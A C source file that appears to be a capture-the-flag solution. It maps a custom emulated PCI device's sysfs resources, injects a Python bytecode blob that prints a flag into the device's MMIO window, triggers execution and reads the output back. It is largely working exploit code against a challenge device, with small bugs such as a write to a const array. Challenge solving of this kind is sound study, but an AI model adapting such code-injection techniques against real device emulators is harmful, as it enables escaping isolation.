// gcc -nostdlib -static mmio_loader.c -o mmio_loader
// Short integer aliases. This file includes no headers, so the types it needs
// are declared by hand.
typedef unsigned long ulong;
typedef unsigned long long u64;
typedef unsigned int u32;
typedef unsigned char u8;
// Linux x86-64 system call numbers; the wrappers below load them into rax
// before executing the `syscall` instruction.
#define SYS_OPENAT 257
#define SYS_MMAP 9
#define SYS_WRITE 1
#define SYS_EXIT 60
// ------------------- syscalls ------------------------
static inline long sys_openat(int dirfd, const char *path, int flags) {
long ret;
asm volatile ("syscall"
: "=a"(ret)
: "0"(SYS_OPENAT), "D"(dirfd), "S"(path), "d"(flags)
: "rcx", "r11", "memory");
return ret;
}
/*
 * Raw mmap(2) system call.
 *
 * The six arguments are handed to the kernel unchanged. The value the kernel
 * leaves in rax is returned as-is (no errno translation is performed here),
 * so callers must interpret it themselves.
 */
static inline long sys_mmap(void *addr, ulong len, ulong prot,
                            ulong flags, ulong fd, ulong off) {
    /*
     * Arguments four to six travel in r10, r8 and r9. Those registers have no
     * single-letter constraint, so each one is pinned with an explicit
     * register variable and passed as a plain "r" operand.
     */
    register ulong arg4 __asm__("r10") = flags;
    register ulong arg5 __asm__("r8") = fd;
    register ulong arg6 __asm__("r9") = off;
    long result;

    __asm__ __volatile__("syscall"
                         : "=a"(result)
                         : "0"(SYS_MMAP), "D"(addr), "S"(len), "d"(prot),
                           "r"(arg4), "r"(arg5), "r"(arg6)
                         : "rcx", "r11", "memory");
    return result;
}
/*
 * Raw write(2) system call.
 *
 * fd  - destination file descriptor
 * buf - first byte to write
 * len - number of bytes to write (unsigned long, so the full 64-bit length
 *       reaches the kernel in rdx)
 *
 * Returns the kernel's raw result from rax without errno translation.
 */
static inline long sys_write(int fd, const void *buf, ulong len) {
    long written;

    __asm__ __volatile__(
        "syscall"
        : "=a"(written)
        : "0"(SYS_WRITE), "D"(fd), "S"(buf), "d"(len)
        : "rcx", "r11", "memory"
    );
    return written;
}
static inline void sys_exit(int code) {
asm volatile(
"syscall"
:
: "a"(SYS_EXIT), "D"(code)
: "rcx", "r11", "memory"
);
}
// ------------------- utils ------------------------
// ------------------- main ------------------------
// sysfs "resource0" file of the PCI device at 0000:00:03.0. _start opens it
// and maps its first page as the register/code window it writes to.
static const char path[] =
"/sys/bus/pci/devices/0000:00:03.0/resource0";
// sysfs "resource1" file of the same device. _start opens it and maps its
// first page, then reads 100 bytes back from it.
static const char path1[] =
"/sys/bus/pci/devices/0000:00:03.0/resource1";
void _start() {
long fd = sys_openat(-100, path, 2); // O_RDWR
if (fd < 0) sys_exit(1);
long fd1 = sys_openat(-100, path1, 2); // O_RDWR
if (fd1 < 0) sys_exit(1);
// ****** FIXED MMAP FLAGS ******
// You used MAP_PRIVATE | MAP_SHARED → illegal → mmap failure → SEGFAULT
//
// Correct for PCI BAR mapping:
// prot = PROT_READ|PROT_WRITE = 3
// flags = MAP_SHARED | MAP_FIXED? no.
// flags = MAP_SHARED | MAP_FILE = 1 | 0x20
//
// For PCI BAR, MAP_SHARED (1) is enough.
u8 *mmio = (u8*)sys_mmap(
0, // addr
0x1000, // len
1 | 2, // prot = PROT_READ|PROT_WRITE
1, // flags = MAP_SHARED
fd, // file descriptor
0 // offset 0
);
if (mmio == (void*)-1 || mmio == 0)
sys_exit(18);
u8 *stdout = (u8*)sys_mmap(
0, // addr
0x1000, // len
1 | 2, // prot = PROT_READ|PROT_WRITE
1, // flags = MAP_SHARED
fd1, // file descriptor
0 // offset 0
);
if (stdout == (void*)-1 || stdout == 0)
sys_exit(18);
// ------------------------------
// Send test Python bytecode
// ------------------------------
u8 patch_bytes[] = {
0xf3,0x0d,0x0d,0x0a,0x03,0x00,0x00,0x00,0x20,0x2a,0xf1,0xcf,0x3a,0x47,0xf4,0xcd
};
const u8 code[] = { 0xf3,0x0d,0x0d,0x0a,0x00,0x00,0x00,0x00,0x79,0xca,0x38,0x69,0x66,0x00,0x00,0x00,0xe3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf3,0x5a,0x00,0x00,0x00,0x95,0x00,0x1e,0x00,0x53,0x00,0x53,0x01,0x4b,0x00,0x72,0x00,0x5c,0x01,0x22,0x00,0x5c,0x00,0x52,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x67,0x01,0x21,0x00,0x5c,0x03,0x07,0x00,0x61,0x0b,0x00,0x00,0x20,0x00,0x5c,0x01,0x22,0x00,0x53,0x02,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x1f,0x00,0x67,0x01,0x66,0x00,0x3d,0x03,0x1f,0x00,0x66,0x01,0x29,0x03,0xe9,0x00,0x00,0x00,0x00,0x4e,0x7a,0x17,0x4e,0x6f,0x20,0x67,0x69,0x66,0x74,0x73,0x20,0x61,0x72,0x65,0x20,0x61,0x76,0x61,0x69,0x6c,0x61,0x62,0x6c,0x65,0x21,0x29,0x04,0xda,0x05,0x67,0x69,0x66,0x74,0x73,0xda,0x05,0x70,0x72,0x69,0x6e,0x74,0xda,0x04,0x66,0x6c,0x61,0x67,0xda,0x09,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xa9,0x00,0xf3,0x00,0x00,0x00,0x00,0xda,0x04,0x6f,0x2e,0x70,0x79,0xda,0x08,0x3c,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x72,0x0a,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x73,0x31,0x00,0x00,0x00,0xf0,0x03,0x01,0x01,0x01,0xf0,0x02,0x04,0x01,0x25,0xdb,0x04,0x10,0xd9,0x04,0x09,0x88,0x25,0x8f,0x2a,0x89,0x2a,0xd5,0x04,0x15,0xf8,0xd8,0x07,0x10,0xf3,0x00,0x01,0x01,0x25,0xd9,0x04,0x09,0xd0,0x0a,0x23,0xd6,0x04,0x24,0xf0,0x03,0x01,0x01,0x25,0xfa,0x73,0x0c,0x00,0x00,0x00,0x82,0x16,0x19,0x00,0x99,0x0e,0x2a,0x03,0xa9,0x01,0x2a,0x03};
const u32 code_len = sizeof(code);
u64 val = 0xf0a0101a75bc9dd3ULL;
*(u64*)(code + 0x08) = val;
for (u32 i = 0; i < code_len; i++)
mmio[0x100 + i] = code[i];
// scratch register
*(u32*)(mmio + 0x04) = code_len;
// code length
*(u32*)(mmio + 0x10) = code_len;
// trigger execution
*(u32*)(mmio + 0x0C) = 1;
char* msg = "MMIO write complete\n";
sys_write(1, msg, 11);
for (int i=0; i < 100; i++) {
char magic = *(char*)(stdout + i);
sys_write(1, &magic, 1);
}
// verify device responds
// print_hex32(*(u32*)(mmio + 0x00)); // should print PYPU magic
sys_exit(0);
}